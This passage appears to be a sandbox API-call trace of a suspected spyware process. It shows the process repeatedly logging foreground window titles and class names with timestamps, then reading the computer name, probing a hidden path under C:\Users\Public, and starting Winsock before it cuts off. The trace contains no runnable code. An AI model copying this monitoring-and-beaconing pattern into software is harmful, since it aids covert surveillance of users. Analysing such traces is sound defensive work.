(hdc=0x40101b8, h=0x830021e) returned 0x1b00017 [0288.345] SetROP2 (hdc=0x40101b8, rop2=13) returned 13 [0288.345] UnrealizeObject (h=0xc100741) returned 1 [0288.345] SelectObject (hdc=0x40101b8, h=0xc100741) returned 0x1900010 [0288.345] SetBkColor (hdc=0x40101b8, color=0xffffff) returned 0xffffff [0288.345] SetBkMode (hdc=0x40101b8, mode=2) returned 2 [0288.345] GetSysColor (nIndex=8) returned 0x0 [0288.345] GetSysColor (nIndex=14) returned 0xffffff [0288.345] DrawThemeTextEx () returned 0x0 [0288.346] SelectObject (hdc=0x40101b8, h=0x1b00017) returned 0x830021e [0288.346] SelectObject (hdc=0x40101b8, h=0x1900015) returned 0xc100741 [0288.346] SelectObject (hdc=0x40101b8, h=0x18a002e) returned 0xb0a0227 [0288.346] GetCurrentPositionEx (in: hdc=0x40101b8, lppt=0x534f21c | out: lppt=0x534f21c) returned 1 [0288.346] ReleaseDC (hWnd=0x0, hDC=0x40101b8) returned 1 [0288.346] InvalidateRect (hWnd=0x10134, lpRect=0x534f208, bErase=1) returned 1 [0288.346] InvalidateRect (hWnd=0x10134, lpRect=0x534f204, bErase=1) returned 1 [0288.346] IsIconic (hWnd=0x10134) returned 0 [0288.346] GetClientRect (in: hWnd=0x10134, lpRect=0x534f200 | out: lpRect=0x534f200) returned 1 [0288.346] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 0 [0288.346] GetCursorPos (in: lpPoint=0x534f904 | out: lpPoint=0x534f904*(x=1428, y=797)) returned 1 [0288.346] WindowFromPoint (Point=0x594) returned 0x100cc [0288.346] GetWindowThreadProcessId (in: hWnd=0x100cc, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0288.346] GetCurrentProcessId () returned 0x470 [0288.346] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0288.346] GetPropW (hWnd=0x100cc, lpString=0xc02f) returned 0x0 [0288.346] GetParent (hWnd=0x100cc) returned 0x100ca [0288.346] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0288.346] GetCurrentProcessId () returned 0x470 [0288.346] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0288.346] GetPropW (hWnd=0x100ca, lpString=0xc02f) returned 0x0 [0288.346] GetParent (hWnd=0x100ca) returned 0x100c6 [0288.346] GetWindowThreadProcessId (in: hWnd=0x100c6, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0288.346] GetCurrentProcessId () returned 0x470 [0288.346] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0288.347] GetPropW (hWnd=0x100c6, lpString=0xc02f) returned 0x0 [0288.347] GetParent (hWnd=0x100c6) returned 0x0 [0288.347] IsWindowVisible (hWnd=0x10134) returned 1 [0288.347] IsWindowEnabled (hWnd=0x10134) returned 1 [0288.347] GetCurrentThreadId () returned 0x62c [0288.347] ResetEvent (hEvent=0x6f8) returned 1 [0288.347] GetCurrentThreadId () returned 0x62c [0288.347] GetCurrentThreadId () returned 0x62c [0288.347] GetCurrentThreadId () returned 0x62c [0288.347] WaitMessage () returned 1 [0289.152] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 1 [0289.152] IsWindowUnicode (hWnd=0x10114) returned 1 [0289.152] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x534f944) returned 1 [0289.152] GetCapture () returned 0x0 [0289.152] GetWindowThreadProcessId (in: hWnd=0x10114, lpdwProcessId=0x534f908 | out: lpdwProcessId=0x534f908) returned 0x62c [0289.152] GetCurrentProcessId () returned 0x470 [0289.152] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0289.152] GetPropW (hWnd=0x10114, lpString=0xc02f) returned 0x0 [0289.153] GetParent (hWnd=0x10114) returned 0x0 [0289.153] TranslateMessage (lpMsg=0x534f944) returned 0 [0289.153] DispatchMessageW (lpMsg=0x534f944) returned 0x0 [0289.153] GetForegroundWindow () returned 0x10134 [0289.153] SendMessageW (hWnd=0x10134, Msg=0xd, wParam=0x100, lParam=0x534f5b0) returned 0x4 [0289.153] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0xd, wParam=0x100, lParam=0x534f5b0) returned 0x4 [0289.153] GetCurrentThreadId () returned 0x62c [0289.153] GetCurrentThreadId () returned 0x62c [0289.153] GetCurrentThreadId () returned 0x62c [0289.153] GetCurrentThreadId () returned 0x62c [0289.153] GetCurrentThreadId () returned 0x62c [0289.153] GetCurrentThreadId () returned 0x62c [0289.153] GetClassNameW (in: hWnd=0x10134, lpClassName=0x534f50e, nMaxCount=256 | out: lpClassName="TFrmMwM41n") returned 10 [0289.153] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 0 [0289.153] GetCursorPos (in: lpPoint=0x534f904 | out: lpPoint=0x534f904*(x=1428, y=797)) returned 1 [0289.153] WindowFromPoint (Point=0x594) returned 0x100cc [0289.153] GetWindowThreadProcessId (in: hWnd=0x100cc, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0289.153] GetCurrentProcessId () returned 0x470 [0289.153] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0289.153] GetPropW (hWnd=0x100cc, lpString=0xc02f) returned 0x0 [0289.153] GetParent (hWnd=0x100cc) returned 0x100ca [0289.153] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0289.153] GetCurrentProcessId () returned 0x470 [0289.153] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0289.154] GetPropW (hWnd=0x100ca, lpString=0xc02f) returned 0x0 [0289.154] GetParent (hWnd=0x100ca) returned 0x100c6 [0289.154] GetWindowThreadProcessId (in: hWnd=0x100c6, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0289.154] GetCurrentProcessId () returned 0x470 [0289.154] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0289.154] GetPropW (hWnd=0x100c6, lpString=0xc02f) returned 0x0 [0289.154] GetParent (hWnd=0x100c6) returned 0x0 [0289.154] IsWindowVisible (hWnd=0x10134) returned 1 [0289.154] IsWindowEnabled (hWnd=0x10134) returned 1 [0289.154] GetCurrentThreadId () returned 0x62c [0289.154] ResetEvent (hEvent=0x6f8) returned 1 [0289.154] GetCurrentThreadId () returned 0x62c [0289.154] GetCurrentThreadId () returned 0x62c [0289.154] GetCurrentThreadId () returned 0x62c [0289.154] WaitMessage () returned 1 [0289.865] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 1 [0289.865] IsWindowUnicode (hWnd=0x10112) returned 1 [0289.865] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x534f944) returned 1 [0289.865] GetCapture () returned 0x0 [0289.865] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x534f908 | out: lpdwProcessId=0x534f908) returned 0x62c [0289.865] GetCurrentProcessId () returned 0x470 [0289.865] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0289.865] GetPropW (hWnd=0x10112, lpString=0xc02f) returned 0x0 [0289.865] GetParent (hWnd=0x10112) returned 0x0 [0289.865] TranslateMessage (lpMsg=0x534f944) returned 0 [0289.865] DispatchMessageW (lpMsg=0x534f944) returned 0x0 [0289.865] GetForegroundWindow () returned 0x10134 [0289.865] GetClassNameW (in: hWnd=0x10134, lpClassName=0x534f50e, nMaxCount=256 | out: lpClassName="TFrmMwM41n") returned 10 [0289.866] GetWindowTextW (in: hWnd=0x10134, lpString=0x534f5b0, nMaxCount=256 | out: lpString="k8w0") returned 4 [0289.866] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0xd, wParam=0x100, lParam=0x534f5b0) returned 0x4 [0289.866] GetCurrentThreadId () returned 0x62c [0289.866] GetCurrentThreadId () returned 0x62c [0289.866] GetCurrentThreadId () returned 0x62c [0289.866] GetCurrentThreadId () returned 0x62c [0289.866] GetCurrentThreadId () returned 0x62c [0289.866] GetCurrentThreadId () returned 0x62c [0289.866] GetLocalTime (in: lpSystemTime=0x534f3d4 | out: lpSystemTime=0x534f3d4*(wYear=0x7e0, wMonth=0x9, wDayOfWeek=0x5, wDay=0x2, wHour=0xa, wMinute=0x0, wSecond=0xc, wMilliseconds=0x327)) [0289.866] InvalidateRect (hWnd=0x10134, lpRect=0x534f24c, bErase=1) returned 1 [0289.866] GetDC (hWnd=0x0) returned 0xc01016e [0289.866] MoveToEx (in: hdc=0xc01016e, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0289.866] SelectObject (hdc=0xc01016e, h=0xb0a0227) returned 0x18a002e [0289.866] GetSysColor (nIndex=8) returned 0x0 [0289.866] SetTextColor (hdc=0xc01016e, color=0x0) returned 0x0 [0289.866] SelectObject (hdc=0xc01016e, h=0x830021e) returned 0x1b00017 [0289.866] SetROP2 (hdc=0xc01016e, rop2=13) returned 13 [0289.866] UnrealizeObject (h=0xc100741) returned 1 [0289.866] SelectObject (hdc=0xc01016e, h=0xc100741) returned 0x1900010 [0289.866] SetBkColor (hdc=0xc01016e, color=0xffffff) returned 0xffffff [0289.866] SetBkMode (hdc=0xc01016e, mode=2) returned 2 [0289.866] GetSysColor (nIndex=8) returned 0x0 [0289.866] GetSysColor (nIndex=14) returned 0xffffff [0289.866] DrawThemeTextEx () returned 0x0 [0289.867] SelectObject (hdc=0xc01016e, h=0x1b00017) returned 0x830021e [0289.867] SelectObject (hdc=0xc01016e, h=0x1900015) returned 0xc100741 [0289.867] SelectObject (hdc=0xc01016e, h=0x18a002e) returned 0xb0a0227 [0289.867] GetCurrentPositionEx (in: hdc=0xc01016e, lppt=0x534f21c | out: lppt=0x534f21c) returned 1 [0289.867] ReleaseDC (hWnd=0x0, hDC=0xc01016e) returned 1 [0289.867] InvalidateRect (hWnd=0x10134, lpRect=0x534f208, bErase=1) returned 1 [0289.867] InvalidateRect (hWnd=0x10134, lpRect=0x534f204, bErase=1) returned 1 [0289.867] IsIconic (hWnd=0x10134) returned 0 [0289.867] GetClientRect (in: hWnd=0x10134, lpRect=0x534f200 | out: lpRect=0x534f200) returned 1 [0289.867] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 0 [0289.867] GetCursorPos (in: lpPoint=0x534f904 | out: lpPoint=0x534f904*(x=814, y=22)) returned 1 [0289.867] WindowFromPoint (Point=0x32e) returned 0x100cc [0289.867] GetWindowThreadProcessId (in: hWnd=0x100cc, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0289.867] GetCurrentProcessId () returned 0x470 [0289.867] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0289.867] GetPropW (hWnd=0x100cc, lpString=0xc02f) returned 0x0 [0289.867] GetParent (hWnd=0x100cc) returned 0x100ca [0289.867] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0289.867] GetCurrentProcessId () returned 0x470 [0289.868] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0289.868] GetPropW (hWnd=0x100ca, lpString=0xc02f) returned 0x0 [0289.868] GetParent (hWnd=0x100ca) returned 0x100c6 [0289.868] GetWindowThreadProcessId (in: hWnd=0x100c6, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0289.868] GetCurrentProcessId () returned 0x470 [0289.868] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0289.868] GetPropW (hWnd=0x100c6, lpString=0xc02f) returned 0x0 [0289.868] GetParent (hWnd=0x100c6) returned 0x0 [0289.868] IsWindowVisible (hWnd=0x10134) returned 1 [0289.868] IsWindowEnabled (hWnd=0x10134) returned 1 [0289.868] GetCurrentThreadId () returned 0x62c [0289.868] ResetEvent (hEvent=0x6f8) returned 1 [0289.868] GetCurrentThreadId () returned 0x62c [0289.868] GetCurrentThreadId () returned 0x62c [0289.868] GetCurrentThreadId () returned 0x62c [0289.868] WaitMessage () returned 1 [0290.045] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 1 [0290.045] IsWindowUnicode (hWnd=0x10114) returned 1 [0290.045] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x534f944) returned 1 [0290.045] GetCapture () returned 0x0 [0290.045] GetWindowThreadProcessId (in: hWnd=0x10114, lpdwProcessId=0x534f908 | out: lpdwProcessId=0x534f908) returned 0x62c [0290.045] GetCurrentProcessId () returned 0x470 [0290.045] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0290.045] GetPropW (hWnd=0x10114, lpString=0xc02f) returned 0x0 [0290.045] GetParent (hWnd=0x10114) returned 0x0 [0290.046] TranslateMessage (lpMsg=0x534f944) returned 0 [0290.046] DispatchMessageW (lpMsg=0x534f944) returned 0x0 [0290.046] GetForegroundWindow () returned 0x10134 [0290.046] SendMessageW (hWnd=0x10134, Msg=0xd, wParam=0x100, lParam=0x534f5b0) returned 0x4 [0290.046] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0xd, wParam=0x100, lParam=0x534f5b0) returned 0x4 [0290.046] GetCurrentThreadId () returned 0x62c [0290.046] GetCurrentThreadId () returned 0x62c [0290.046] GetCurrentThreadId () returned 0x62c [0290.046] GetCurrentThreadId () returned 0x62c [0290.046] GetCurrentThreadId () returned 0x62c [0290.046] GetCurrentThreadId () returned 0x62c [0290.046] GetClassNameW (in: hWnd=0x10134, lpClassName=0x534f50e, nMaxCount=256 | out: lpClassName="TFrmMwM41n") returned 10 [0290.046] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 0 [0290.046] GetCursorPos (in: lpPoint=0x534f904 | out: lpPoint=0x534f904*(x=814, y=22)) returned 1 [0290.046] WindowFromPoint (Point=0x32e) returned 0x100cc [0290.046] GetWindowThreadProcessId (in: hWnd=0x100cc, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0290.046] GetCurrentProcessId () returned 0x470 [0290.046] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0290.046] GetPropW (hWnd=0x100cc, lpString=0xc02f) returned 0x0 [0290.046] GetParent (hWnd=0x100cc) returned 0x100ca [0290.046] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0290.046] GetCurrentProcessId () returned 0x470 [0290.046] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0290.046] GetPropW (hWnd=0x100ca, lpString=0xc02f) returned 0x0 [0290.046] GetParent (hWnd=0x100ca) returned 0x100c6 [0290.047] GetWindowThreadProcessId (in: hWnd=0x100c6, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0290.047] GetCurrentProcessId () returned 0x470 [0290.047] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0290.047] GetPropW (hWnd=0x100c6, lpString=0xc02f) returned 0x0 [0290.047] GetParent (hWnd=0x100c6) returned 0x0 [0290.047] IsWindowVisible (hWnd=0x10134) returned 1 [0290.047] IsWindowEnabled (hWnd=0x10134) returned 1 [0290.047] GetCurrentThreadId () returned 0x62c [0290.047] ResetEvent (hEvent=0x6f8) returned 1 [0290.047] GetCurrentThreadId () returned 0x62c [0290.047] GetCurrentThreadId () returned 0x62c [0290.047] GetCurrentThreadId () returned 0x62c [0290.047] WaitMessage () returned 1 [0291.199] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 1 [0291.199] IsWindowUnicode (hWnd=0x10114) returned 1 [0291.199] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x534f944) returned 1 [0291.199] GetCapture () returned 0x0 [0291.199] GetWindowThreadProcessId (in: hWnd=0x10114, lpdwProcessId=0x534f908 | out: lpdwProcessId=0x534f908) returned 0x62c [0291.199] GetCurrentProcessId () returned 0x470 [0291.199] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0291.199] GetPropW (hWnd=0x10114, lpString=0xc02f) returned 0x0 [0291.199] GetParent (hWnd=0x10114) returned 0x0 [0291.199] TranslateMessage (lpMsg=0x534f944) returned 0 [0291.199] DispatchMessageW (lpMsg=0x534f944) returned 0x0 [0291.199] GetForegroundWindow () returned 0x10134 [0291.199] SendMessageW (hWnd=0x10134, Msg=0xd, wParam=0x100, lParam=0x534f5b0) returned 0x4 [0291.199] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0xd, wParam=0x100, lParam=0x534f5b0) returned 0x4 [0291.199] GetCurrentThreadId () returned 0x62c [0291.199] GetCurrentThreadId () returned 0x62c [0291.199] GetCurrentThreadId () returned 0x62c [0291.199] GetCurrentThreadId () returned 0x62c [0291.199] GetCurrentThreadId () returned 0x62c [0291.199] GetCurrentThreadId () returned 0x62c [0291.200] GetClassNameW (in: hWnd=0x10134, lpClassName=0x534f50e, nMaxCount=256 | out: lpClassName="TFrmMwM41n") returned 10 [0291.200] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 0 [0291.200] GetCursorPos (in: lpPoint=0x534f904 | out: lpPoint=0x534f904*(x=814, y=22)) returned 1 [0291.200] WindowFromPoint (Point=0x32e) returned 0x100cc [0291.200] GetWindowThreadProcessId (in: hWnd=0x100cc, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0291.200] GetCurrentProcessId () returned 0x470 [0291.200] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0291.200] GetPropW (hWnd=0x100cc, lpString=0xc02f) returned 0x0 [0291.200] GetParent (hWnd=0x100cc) returned 0x100ca [0291.200] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0291.200] GetCurrentProcessId () returned 0x470 [0291.200] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0291.200] GetPropW (hWnd=0x100ca, lpString=0xc02f) returned 0x0 [0291.200] GetParent (hWnd=0x100ca) returned 0x100c6 [0291.200] GetWindowThreadProcessId (in: hWnd=0x100c6, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0291.200] GetCurrentProcessId () returned 0x470 [0291.200] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0291.200] GetPropW (hWnd=0x100c6, lpString=0xc02f) returned 0x0 [0291.200] GetParent (hWnd=0x100c6) returned 0x0 [0291.200] IsWindowVisible (hWnd=0x10134) returned 1 [0291.200] IsWindowEnabled (hWnd=0x10134) returned 1 [0291.200] GetCurrentThreadId () returned 0x62c [0291.201] ResetEvent (hEvent=0x6f8) returned 1 [0291.201] GetCurrentThreadId () returned 0x62c [0291.201] GetCurrentThreadId () returned 0x62c [0291.201] GetCurrentThreadId () returned 0x62c [0291.201] WaitMessage () returned 1 [0291.511] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 1 [0291.511] IsWindowUnicode (hWnd=0x10112) returned 1 [0291.511] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x534f944) returned 1 [0291.511] GetCapture () returned 0x0 [0291.511] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x534f908 | out: lpdwProcessId=0x534f908) returned 0x62c [0291.511] GetCurrentProcessId () returned 0x470 [0291.511] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0291.511] GetPropW (hWnd=0x10112, lpString=0xc02f) returned 0x0 [0291.511] GetParent (hWnd=0x10112) returned 0x0 [0291.511] TranslateMessage (lpMsg=0x534f944) returned 0 [0291.511] DispatchMessageW (lpMsg=0x534f944) returned 0x0 [0291.511] GetForegroundWindow () returned 0x100cc [0291.511] GetClassNameW (in: hWnd=0x100cc, lpClassName=0x534f50e, nMaxCount=256 | out: lpClassName="SysListView32") returned 13 [0291.511] GetWindowTextW (in: hWnd=0x100cc, lpString=0x534f5b0, nMaxCount=256 | out: lpString="FolderView") returned 10 [0291.512] GetLocalTime (in: lpSystemTime=0x534f3d4 | out: lpSystemTime=0x534f3d4*(wYear=0x7e0, wMonth=0x9, wDayOfWeek=0x5, wDay=0x2, wHour=0xa, wMinute=0x0, wSecond=0xe, wMilliseconds=0x140)) [0291.512] InvalidateRect (hWnd=0x10134, lpRect=0x534f24c, bErase=1) returned 1 [0291.512] GetDC (hWnd=0x0) returned 0xc01016e [0291.512] MoveToEx (in: hdc=0xc01016e, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0291.513] SelectObject (hdc=0xc01016e, h=0xb0a0227) returned 0x18a002e [0291.513] GetSysColor (nIndex=8) returned 0x0 [0291.513] SetTextColor (hdc=0xc01016e, color=0x0) returned 0x0 [0291.513] SelectObject (hdc=0xc01016e, h=0x830021e) returned 0x1b00017 [0291.513] SetROP2 (hdc=0xc01016e, rop2=13) returned 13 [0291.513] UnrealizeObject (h=0xc100741) returned 1 [0291.513] SelectObject (hdc=0xc01016e, h=0xc100741) returned 0x1900010 [0291.513] SetBkColor (hdc=0xc01016e, color=0xffffff) returned 0xffffff [0291.513] SetBkMode (hdc=0xc01016e, mode=2) returned 2 [0291.513] GetSysColor (nIndex=8) returned 0x0 [0291.513] GetSysColor (nIndex=14) returned 0xffffff [0291.513] DrawThemeTextEx () returned 0x0 [0291.513] SelectObject (hdc=0xc01016e, h=0x1b00017) returned 0x830021e [0291.513] SelectObject (hdc=0xc01016e, h=0x1900015) returned 0xc100741 [0291.513] SelectObject (hdc=0xc01016e, h=0x18a002e) returned 0xb0a0227 [0291.513] GetCurrentPositionEx (in: hdc=0xc01016e, lppt=0x534f21c | out: lppt=0x534f21c) returned 1 [0291.513] ReleaseDC (hWnd=0x0, hDC=0xc01016e) returned 1 [0291.513] InvalidateRect (hWnd=0x10134, lpRect=0x534f208, bErase=1) returned 1 [0291.514] InvalidateRect (hWnd=0x10134, lpRect=0x534f204, bErase=1) returned 1 [0291.514] IsIconic (hWnd=0x10134) returned 0 [0291.514] GetClientRect (in: hWnd=0x10134, lpRect=0x534f200 | out: lpRect=0x534f200) returned 1 [0291.514] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 0 [0291.514] GetCursorPos (in: lpPoint=0x534f904 | out: lpPoint=0x534f904*(x=814, y=22)) returned 1 [0291.514] WindowFromPoint (Point=0x32e) returned 0x100cc [0291.514] GetWindowThreadProcessId (in: hWnd=0x100cc, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0291.514] GetCurrentProcessId () returned 0x470 [0291.514] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0291.514] GetPropW (hWnd=0x100cc, lpString=0xc02f) returned 0x0 [0291.514] GetParent (hWnd=0x100cc) returned 0x100ca [0291.514] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0291.514] GetCurrentProcessId () returned 0x470 [0291.514] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0291.514] GetPropW (hWnd=0x100ca, lpString=0xc02f) returned 0x0 [0291.514] GetParent (hWnd=0x100ca) returned 0x100c6 [0291.514] GetWindowThreadProcessId (in: hWnd=0x100c6, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0291.514] GetCurrentProcessId () returned 0x470 [0291.514] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0291.514] GetPropW (hWnd=0x100c6, lpString=0xc02f) returned 0x0 [0291.514] GetParent (hWnd=0x100c6) returned 0x0 [0291.514] IsWindowVisible (hWnd=0x10134) returned 1 [0291.514] IsWindowEnabled (hWnd=0x10134) returned 1 [0291.514] GetCurrentThreadId () returned 0x62c [0291.515] ResetEvent (hEvent=0x6f8) returned 1 [0291.515] GetCurrentThreadId () returned 0x62c [0291.515] GetCurrentThreadId () returned 0x62c [0291.515] GetCurrentThreadId () returned 0x62c [0291.515] WaitMessage () returned 1 [0292.088] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 1 [0292.088] IsWindowUnicode (hWnd=0x10122) returned 1 [0292.088] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x534f944) returned 1 [0292.088] GetCapture () returned 0x0 [0292.088] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x534f908 | out: lpdwProcessId=0x534f908) returned 0x62c [0292.088] GetCurrentProcessId () returned 0x470 [0292.088] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0292.088] GetPropW (hWnd=0x10122, lpString=0xc02f) returned 0x0 [0292.088] GetParent (hWnd=0x10122) returned 0x0 [0292.088] TranslateMessage (lpMsg=0x534f944) returned 0 [0292.088] DispatchMessageW (lpMsg=0x534f944) returned 0x0 [0292.088] QueryPerformanceCounter (in: lpPerformanceCount=0x534f708 | out: lpPerformanceCount=0x534f708*=16438802716556) returned 1 [0292.088] KillTimer (hWnd=0x10122, uIDEvent=0x1) returned 1 [0292.088] SetTimer (hWnd=0x10122, nIDEvent=0x1, uElapse=0x927c0, lpTimerFunc=0x0) returned 0x1 [0292.088] GetFileAttributesW (lpFileName="C:\\Users\\Public\\") returned 0x11 [0292.089] GetComputerNameW (in: lpBuffer=0x635fd64, nSize=0x534f6c0 | out: lpBuffer="N3EERVTWSM", nSize=0x534f6c0) returned 1 [0292.089] GetComputerNameW (in: lpBuffer=0x635fddc, nSize=0x534f6fc | out: lpBuffer="N3EERVTWSM", nSize=0x534f6fc) returned 1 [0292.089] GetComputerNameW (in: lpBuffer=0x635fddc, nSize=0x534f6d4 | out: lpBuffer="N3EERVTWSM", nSize=0x534f6d4) returned 1 [0292.089] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\N3Ew3.51N3E") returned 0xffffffff [0292.089] GetLastError () returned 0x2 [0292.089] SetErrorMode (uMode=0x8000) returned 0x1 [0292.089] LoadLibraryW (lpLibFileName="WS2_32.DLL") returned 0x75fd0000 [0292.092] SetErrorMode (uMode=0x1) returned 0x8000 [0292.092] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAStartup", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0292.092] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAStartup", cchWideChar=10, lpMultiByteStr=0x634a2dc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSAStartup", lpUsedDefaultChar=0x0) returned 10 [0292.092] GetProcAddress (hModule=0x75fd0000, lpProcName="WSAStartup") returned 0x75fd3ab2 [0292.092] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x534f4d6 | out: lpWSAData=0x534f4d6) returned 0 [0292.092] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetAddrInfoW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) 